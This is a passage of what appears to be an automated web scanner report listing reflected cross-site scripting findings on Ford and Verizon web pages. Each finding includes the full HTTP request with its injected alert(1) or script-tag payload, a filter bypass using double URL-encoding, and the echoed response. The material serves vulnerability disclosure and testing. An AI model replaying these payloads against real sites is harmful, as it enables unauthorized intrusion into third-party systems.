Cookie: userInfo=country_code=US,region_code=TX,city=DALLAS,county=DALLAS,zip=75201-75212+75214-75254+75258+75260-75267+75270+75275+75277+75283-75287+75294-75295+75301+75303+75310+75312-75313+75315+75320+75323+75326+75336+75339+75342+75346+75353-75357+75359-75360+75363-75364+75367-75368+75370-75374+75376+75378-75382+75386-75398; N1Z4=3eWtBBPhsCR-4jzP2Z0GuHBwTJ8cthcMPgKQF-EbpTxzGQmYEntRODg; FPI=model=Mustang&make=Ford&year=2011&html=false; sessionActive=true; s_cc=true; s_p_s_prop8=natural-referrer; ev_36_getval=20101119%2018; visivalm=0; visivale=0; lastcheck=1; s_sq=fmcfvngprod%2Cfmcglobal%3D%2526pid%253Dfv%25253Asite%252520search%252520results%25253Apage%2525201%2526pidt%253D1%2526oid%253Dhttp%25253A//www2.showroom.fordvehicles.com/FDShowroom.jsp%25253Fbranding%25253D1%252526referringSite%25253D1%252526lang%25253Den%252526makeTransiti%2526ot%253DA%2526oi%253D1589; ev22_getval=%60

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 03:07:12 GMT
Connection: close
Content-Length: 115367

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Ford Vehicle Showroom</title>


<script type="text/javascript">
//<![CDATA[
...[SNIP]...
efined, wtk will NOT load implicitly on DOMReady
var pageRefreshed = false;

var clubWTKWidgets = true;
var urlParamMap = {
'document_referrer':document.referrer,'makeTransition':unescape('inventory67b93';alert(1)//711fbffab0c'),'Skin':'Mustang','FVS':false,'referringSite':'1'
,'branding':'1'
,'makeTransition':'inventory67b93';alert(1)//711fbffab0c'
,'lang':'en'
};

if(typeof urlParamMap.httpReferer != "undefined"){
urlPa
...[SNIP]...

2.817. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.showroom.fordvehicles.com
Path:   /FDShowroom.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ab00'%3balert(1)//6b000ac3a6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ab00';alert(1)//6b000ac3a6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FDShowroom.jsp?5ab00'%3balert(1)//6b000ac3a6b=1 HTTP/1.1
Host: www2.showroom.fordvehicles.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ev22_getval=%60; FPI=model=Mustang&make=Ford&year=2011&html=false; visivalm=0; lastcheck=1; s_sq=%5B%5BB%5D%5D; sessionActive=true; N1Z4=3eWtBBPhsCR-4jzP2Z0GuHBwTJ8cthcMPgKQF-EbpTxzGQmYEntRODg; ev_36_getval=20101119%2018; s_cc=true; NaNurlParamMap=document_referrer=http%3A%2F%2Fwww.fordvehicles.com%2Fsearch%2F%3Ff%253AsearchInputString%3D%2560%26f%253Asearch%3D%2B%26formID%3DglobalSearchForm&makeTransition=inventory&Skin=Mustang&FVS=false&referringSite=1&branding=1&lang=en; s_p_s_prop8=natural-referrer; JSSESSIONID=DE3A8242-54BB-4EE9-9D50-17B3DFD14501; userInfo=country_code=US,region_code=TX,city=DALLAS,county=DALLAS,zip=75201-75212+75214-75254+75258+75260-75267+75270+75275+75277+75283-75287+75294-75295+75301+75303+75310+75312-75313+75315+75320+75323+75326+75336+75339+75342+75346+75353-75357+75359-75360+75363-75364+75367-75368+75370-75374+75376+75378-75382+75386-75398; visivale=0;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Date: Sat, 20 Nov 2010 03:07:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 115228

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Ford Vehicle Showroom</title>


<script type="text/javascript">
//<![CDATA[
...[SNIP]...
r is defined, wtk will NOT load implicitly on DOMReady
var pageRefreshed = false;

var clubWTKWidgets = true;
var urlParamMap = {
'document_referrer':document.referrer,'Skin':'Mustang','FVS':false,'5ab00';alert(1)//6b000ac3a6b':'1'
};

if(typeof urlParamMap.httpReferer != "undefined"){
urlParamMap.httpReferer = escape(urlParamMap.httpReferer);
}
if(typeof urlParamMap.referrerURL != "undefined"){
urlParamMap.referrerURL
...[SNIP]...

2.818. http://www2.showroom.fordvehicles.com/FDShowroom.jsp [referringSite parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.showroom.fordvehicles.com
Path:   /FDShowroom.jsp

Issue detail

The value of the referringSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7db4f'%3balert(1)//f6c6f4c965a was submitted in the referringSite parameter. This input was echoed as 7db4f';alert(1)//f6c6f4c965a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FDShowroom.jsp?branding=1&referringSite=17db4f'%3balert(1)//f6c6f4c965a&lang=en&makeTransition=inventory HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.fordvehicles.com/search/?f%3AsearchInputString=%60&f%3Asearch=+&formID=globalSearchForm
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www2.showroom.fordvehicles.com
Proxy-Connection: Keep-Alive
Cookie: userInfo=country_code=US,region_code=TX,city=DALLAS,county=DALLAS,zip=75201-75212+75214-75254+75258+75260-75267+75270+75275+75277+75283-75287+75294-75295+75301+75303+75310+75312-75313+75315+75320+75323+75326+75336+75339+75342+75346+75353-75357+75359-75360+75363-75364+75367-75368+75370-75374+75376+75378-75382+75386-75398; N1Z4=3eWtBBPhsCR-4jzP2Z0GuHBwTJ8cthcMPgKQF-EbpTxzGQmYEntRODg; FPI=model=Mustang&make=Ford&year=2011&html=false; sessionActive=true; s_cc=true; s_p_s_prop8=natural-referrer; ev_36_getval=20101119%2018; visivalm=0; visivale=0; lastcheck=1; s_sq=fmcfvngprod%2Cfmcglobal%3D%2526pid%253Dfv%25253Asite%252520search%252520results%25253Apage%2525201%2526pidt%253D1%2526oid%253Dhttp%25253A//www2.showroom.fordvehicles.com/FDShowroom.jsp%25253Fbranding%25253D1%252526referringSite%25253D1%252526lang%25253Den%252526makeTransiti%2526ot%253DA%2526oi%253D1589; ev22_getval=%60

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/6.1.0.29 Apache/2.0.47
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
X-Pad: avoid browser bug
Vary: Accept-Encoding
Date: Sat, 20 Nov 2010 03:07:11 GMT
Connection: close
Content-Length: 115339

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Ford Vehicle Showroom</title>


<script type="text/javascript">
//<![CDATA[
...[SNIP]...
var pageRefreshed = false;

var clubWTKWidgets = true;
var urlParamMap = {
'document_referrer':document.referrer,'makeTransition':unescape('inventory'),'Skin':'Mustang','FVS':false,'referringSite':'17db4f';alert(1)//f6c6f4c965a'
,'branding':'1'
,'makeTransition':'inventory'
,'lang':'en'
};

if(typeof urlParamMap.httpReferer != "undefined"){
urlParamMap.httpReferer = escape(urlParamMap.httpReferer);
}
if(typeof urlParamMa
...[SNIP]...

2.819. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www22.business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b92a(a)3fb18037f68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal2b92a(a)3fb18037f68/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=3Wv1Mn7dQ3C2rWTzcFFqCm50vMk5HvpjbhG9JWDGq3vsWv8NptVn!-2072702529; path=/

Resource /SMBPortal2b92a(a)3fb18037f68/smb could not be resolved for locale null.

2.820. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www22.business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b793e(a)11cbe181d16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smbb793e(a)11cbe181d16?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=RQNpMn7dCvNNTPY5T5Hy0PGmqJrhpX4vKCMRrnr7kQRgpSVl5sy3!-1644393018; path=/

Resource /SMBPortal/smbb793e(a)11cbe181d16 could not be resolved for locale null.

2.821. http://www22.business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb [_pageLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.business.verizon.net
Path:   /SMBPortalWeb/appmanager/SMBPortal/smb

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12ba5'-alert(1)-'185cc5084d0 was submitted in the _pageLabel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_main_marketplace12ba5'-alert(1)-'185cc5084d0&showGS=true HTTP/1.1
Host: www22.business.verizon.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: amlbcookie=02; state=; product_type=Unknown; op629viss-vobsgum=a00n02c07e26bkl00g6vda26bkl00m6pje9da; hvariable=0; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=; SITESERVER=ID=2c8e1022bf0cc917099edbc587c6cb62; lob=consumer; AprURL=http%3A%2F%2Fsurround.verizon.net%2FShop%2FUtilities%2FDefault.aspx; ActualProtectedResource=http://surround.verizon.net/Shop/Utilities/Default.aspx

Response (redirected)

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Sat, 20 Nov 2010 03:07:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 20 Nov 2010 03:07:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=6BFkMn7cQlKLsvfzxSGcmYJpLqLvp8BpnKlLwn40STNYtD5rY6v1!1950273172; path=/
Content-Length: 112566

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Verizon Sma
...[SNIP]...
aderText");
           
       if(searchFlow != null && searchFlow == "Shop")
           searchBox = document.getElementById("searchShopHeaderText");    
       
       var f_pageDefLabel = 'SMBPortal_page_main_marketplace12ba5'-alert(1)-'185cc5084d0';
       if (f_pageDefLabel != "SMBPortal_page_SignIn")
           searchBox.focus();
   }
   
   onload = focusIt;
   // end WR 61703
   
</script>
...[SNIP]...

2.822. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">450552b46bf parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e"><script>alert(1)</script>450552b46bf request parameter is copied into the HTML document as plain text between tags. The payload 30dd7<script>alert(1)</script>5e4c65629c4 was submitted in the 3828e"><script>alert(1)</script>450552b46bf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>450552b46bf=130dd7<script>alert(1)</script>5e4c65629c4 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www22.verizon.com
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA14V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:54:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:54:22 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=85ff4439-03f7-4614-a14f-6076686da86b; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6cf45525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 00:59:22 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47385


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>450552b46bf=130dd7<script>alert(1)</script>5e4c65629c4" name="target">
...[SNIP]...

2.823. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [3828e">HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN request parameter is copied into the HTML document as plain text between tags. The payload 194d1<script>alert(1)</script>6bba43a7f86 was submitted in the 3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1194d1<script>alert(1)</script>6bba43a7f86 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www22.verizon.com
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI; RegistrationApp=SessionId=fe2667e8-4e28-4de7-8250-68e0b90911ca; VZGEO=west

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Expires: Sat, 20 Nov 2010 00:55:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:55:10 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 01:00:10 GMT; path=/foryourhome/registration/; domain=verizon.com
Content-Length: 47430


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
</script>HOYT.LLC.XSS.PoC.11.19.2010.WWW.VERIZON.COM.1954.EASTERN=1194d1<script>alert(1)</script>6bba43a7f86" name="target">
...[SNIP]...

2.824. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ed70%2522%253b8696e4c5353 was submitted in the REST URL parameter 3. This input was echoed as 1ed70";8696e4c5353 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ForyourHome/Registration/Reg1ed70%2522%253b8696e4c5353/OrLogin.aspx?3828e"><script>alert(1)</script>450552b46bf=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www22.verizon.com
Cookie: CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; Source=CHSI

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=7199
Date: Sun, 21 Nov 2010 17:23:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDCSBCCATB=GCGMHODCPKCPLNCJEGJLLFDG; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Sun, 21-Nov-2010 17:28:47 GMT; path=/myverizon/; domain=verizon.com
Content-Length: 128973

<!-- Vignette V6 Sun Nov 21 09:23:46 2010 -->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Verizon | My Verizon Sign In - Online Account Management</title>
...[SNIP]...
t.cookie="MyVzCom=remopt=Y&uid="+strMyVzCom+";expires="+expireDate.toGMTString()+";path=/;domain="+scbCkDom;
}
if(bLog){
   window.location.href='https://www22.verizon.com/ForyourHome/Registration/Reg1ed70";8696e4c5353/OrLogin.aspx?3828e"scriptalert1/script450552b46bf=1';
<!-- Vignette V6 Sun Nov 21 09:23:46 2010 -->
...[SNIP]...

2.825. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3828e"><script>alert(1)</script>450552b46bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?3828e"><script>alert(1)</script>450552b46bf=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
